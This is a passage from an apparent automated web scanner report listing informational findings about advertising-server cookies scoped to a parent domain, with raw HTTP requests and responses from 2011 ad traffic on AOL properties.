GET /site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/Android/dailyfinance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDU5OTE0NjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=8ppwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYAcY6ACsMihNhAnjaYTIEv9F2E; F1=BwnmC3kAAAAAmc1CAEAAJAgAAAAA6c1CAEAAJAABAAAABAAAAEAAgEA; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ4I!; ROLL=boAno2C6PRAgcQG!

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 12:43:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956583.743207.93241795XMC
Set-Cookie: C2=3tpwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYAcY6ACsMihNhAnjaYTIEv9F2E; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
Set-Cookie: F1=Bc3mC3kAAAAAmc1CAEAAJAgAAAAA6c1CAEAAJAABAAAABAAAAIAAgEA; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
Set-Cookie: BASE=Rgwq8yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrM!; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
Set-Cookie: ROLL=boAnr2C6PRAgcQG7fBnz6XH!; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
Set-Cookie: 29138469=_4dc29b77,0410804442,743207^956583^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 12:43:35 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735221/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000743207/mnum=0000956
...[SNIP]...

16.92. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/engadget/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; C2=qppwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYYTY6ACsMihNhAnjaYTIEv9F2E; GUID=MTMwNDU5OTE0NjsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 12:39:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894905.743207.93241795XMC
Set-Cookie: C2=8ppwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYAcY6ACsMihNhAnjaYTIEv9F2E; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
Set-Cookie: F1=BwnmC3kAAAAAmc1CAEAAJAgAAAAA6c1CAEAAJAABAAAABAAAAEAAgEA; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
Set-Cookie: BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
Set-Cookie: ROLL=boAno2C6PRAgcQG!; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
Set-Cookie: 55333782=_4dc29a7c,3723375835,743207^894905^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 12:39:25 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735225/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000743207/mnum=0000894
...[SNIP]...

16.93. http://r1-ads.ace.advertising.com/site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=Bc6uB3EBAAAABAAAAEAAgEA; BASE=Rgwq3yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9pF!; ROLL=boAno2Cov1BgAaG!; C2=NXfwN5pqEIxFGJpovUg3sY0NSKMCItdhWhQ3WXoVIoLOGaFCKGehWhQ3gZoVIMa4FaFCEGehWhAmoZoVIwtlGaFCA9qhWhw2kXoVIsijGaFCGenhWhQQvaoVI0kmGaFC3mphWVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAH; GUID=MTMwNDU1NzAwNTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:56:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894907.743226.93232707XMC
Set-Cookie: C2=YXfwN5pqEIxFGJpovUg3sY0NSKMCItdhWhQ3WXoVIoLOGaFCKGehWhQ3gZoVIMa4FaFCEGehWhAmoZoVIwtlGaFCA9qhWhw2kXoVIsijGaFCGenhWhQQvaoVI0kmGaFC3mphWVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwB; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
Set-Cookie: F1=Bgd9B3kAAAAA6c1CAEAAgEABAAAABAAAAIAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
Set-Cookie: BASE=RgwqwyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+G!; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
Set-Cookie: ROLL=boAno2C+PRAglcG!; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:56:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735228/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894
...[SNIP]...

16.94. http://r1-ads.ace.advertising.com/site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://realestate.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=Bof9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAQAA+CA; BASE=RgwqyyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9B!; ROLL=boAnq2C+PRAglcGLPJnzdbH8d75VK2B!; C2=xYfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIA0rGAHC25lBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIoN5FAHCFBqBwhQTaaAcIE0rGAHCGenBwhwoyaAc1qaBaMrR3U7qFEysGMWkBUAoNX8imZOiGaQsjUAbUa4YNS/B73chOvIuFUAsFRpZrgqxbCrnF8ekGKal0Xw6iaElTCVB0kdhiyq7FEwcGKKtyVw2saoopeQBP7lhiCKYG8KIGfysVbAJqakdj+uBXTjRuGJwHsb0Fbpr5fAhTaExzC1BLRqRPjq/HEqXGW9nDfAIcYQ/1+PCVSrxaZW60askhaBCdPiBwFKvIcuKGAHmOgALjYAcIw5oGAH; GUID=MTMwNDU1NzEwNTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:58:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894905.743227.93310501XMC
Set-Cookie: C2=3YfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIA0rGAHC25lBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIoN5FAHCFBqBwhQTaaAcIE0rGAHCGenBwhwoyaAc1qaBaMrR3U7qFEysGMWkBUAoNX8imZOiGaQsjUAbUa4YNS/B73chOvIuFUAsFRpZrgqxbCrnF8ekGKal0Xw6iaElTCVB0kdhiyq7FEwcGKKtyVw2saoopeQBP7lhiCKYG8KIGfysVbAJqakdj+uBXTjRuGJwHsb0Fbpr5fAhTaExzC1BLRqRPjq/HEqXGW9nDfAIcYQ/1+PCVSrxaZW60askhaBCdPiBwFKvIcuKGAHmOgALjYAcIw5oGAHCxbfBwB; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
Set-Cookie: F1=Bcj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAUAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
Set-Cookie: BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
Set-Cookie: ROLL=boAnt2C+PRAglcGLPJnzdbH8d75VK2BUk5QpnoE!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:31 GMT; path=/
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:58:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735225/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000743227/mnum=0000894
...[SNIP]...

16.95. http://r1-ads.ace.advertising.com/site=790523/size=300250/u=2/bnum=26673240/xsxdata=1:93310299/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=790523/size=300250/u=2/bnum=26673240/xsxdata=1:93310299/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=790523/size=300250/u=2/bnum=26673240/xsxdata=1:93310299/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BAf9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAMAA+CA; BASE=RgwqxyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHK!; ROLL=boAnr2C+PRAglcGLPJnzdbH!; C2=wXfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwB; GUID=MTMwNDU1NzA0MDsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:57:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1002049.790523.93310299XMC
